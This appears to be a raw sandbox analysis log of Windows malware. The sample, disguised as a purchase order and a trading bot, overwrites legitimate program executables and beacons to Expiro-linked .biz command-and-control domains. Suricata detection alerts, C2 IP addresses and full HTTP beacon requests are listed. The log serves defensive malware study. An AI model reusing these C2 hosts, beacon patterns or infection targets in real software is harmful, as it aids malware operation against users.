Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Code function: 4x nop then jmp 07AC2ED9h	0_2_07AC3155
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Code function: 4x nop then jmp 09432161h	10_2_094323DD
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then jmp 02B77394h	17_2_02B77187
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then jmp 02B778DCh	17_2_02B77687
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	17_2_02B77E60
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	17_2_02B77E5F
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 02455782h	19_2_02455358
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 024551B9h	19_2_02454F08
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 02455782h	19_2_024556AF
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B9F028h	19_2_04B9ED80
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B91935h	19_2_04B915F8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B90741h	19_2_04B90498
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B9BF28h	19_2_04B9BC80
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B9E778h	19_2_04B9E4D0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B9DEC8h	19_2_04B9DC20
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B93EF8h	19_2_04B93C50
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B9D088h	19_2_04B9CDE0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B9C7D8h	19_2_04B9C530
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B90FF1h	19_2_04B90D48
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B9D93Ah	19_2_04B9D690
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B9A970h	19_2_04B9A6C8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B9F8D8h	19_2_04B9F630
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B9A0C0h	19_2_04B99E18
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B93AA0h	19_2_04B937F8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B9B220h	19_2_04B9AF78
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B931F0h	19_2_04B92F48
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B94350h	19_2_04B940A8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B90B99h	19_2_04B908F0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B9C380h	19_2_04B9C0D8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B9BAD0h	19_2_04B9B828
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B9E320h	19_2_04B9E078
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B902E9h	19_2_04B90040
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B91449h	19_2_04B911A0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B9CC30h	19_2_04B9C988
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B9F480h	19_2_04B9F1D8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B9EBD0h	19_2_04B9E928
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B9FD30h	19_2_04B9FA88
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B92D98h	19_2_04B92AF0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B9D4E0h	19_2_04B9D238
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B9A518h	19_2_04B9A270
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B93648h	19_2_04B933A0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B9B678h	19_2_04B9B3D0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 04B9ADC8h	19_2_04B9AB20
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 4x nop then jmp 0645BCBDh	35_2_0645BA40

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49757 -> 72.52.178.23:80
Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:63397 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:51179 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:57418 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49938 -> 54.244.188.177:80

Source: unknown

Network traffic detected: DNS query count 34

Source: global traffic

HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 13.248.148.254 13.248.148.254
Source: Joe Sandbox View	IP Address: 13.248.148.254 13.248.148.254

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.4:49745
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.4:49745
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.4:49742
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.4:49742
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.4:49739
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.4:49739
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.4:49800
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.4:49789
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.4:49800
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.4:49789
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.4:49841
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.4:49841
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.227.7.138:80 -> 192.168.2.4:49847
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.227.7.138:80 -> 192.168.2.4:49847
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.4:49883
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.4:49883
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.4:49891
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.4:49891
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.4:49927
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.4:49927

Source: global traffic	HTTP traffic detected: POST /haobwbcukjixe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
Source: global traffic	HTTP traffic detected: POST /mshapsve HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /mmfoish HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /oxojrkg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /bufnddtl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xpqdcslnor HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: GET /xpqdcslnor?usid=27&utid=10221865676 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
Source: global traffic	HTTP traffic detected: POST /ewl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: GET /ewl?usid=27&utid=10221865931 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
Source: global traffic	HTTP traffic detected: POST /tnupafomghuok HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /yrkakyyuj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: POST /yos HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 812
Source: global traffic	HTTP traffic detected: POST /snkwxvqngv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 812
Source: global traffic	HTTP traffic detected: POST /wthge HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 812
Source: global traffic	HTTP traffic detected: POST /tloalmkxssnuris HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 812
Source: global traffic	HTTP traffic detected: POST /ehlglgm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 812
Source: global traffic	HTTP traffic detected: POST /htmlawrabimntg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /mxuujpbjwek HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ms HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ld HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /kcogybxqholgdpl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /k HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /we HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: GET /m?usid=27&utid=10221880067 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
Source: global traffic	HTTP traffic detected: POST /mt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: GET /mt?usid=27&utid=10221880299 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
Source: global traffic	HTTP traffic detected: POST /bilswy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /nrp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lgyfu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /mblybww HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rbdfcj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rss HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vnlfrtbjm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lcaecfwoxcmb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /okuqeyemp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lwt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
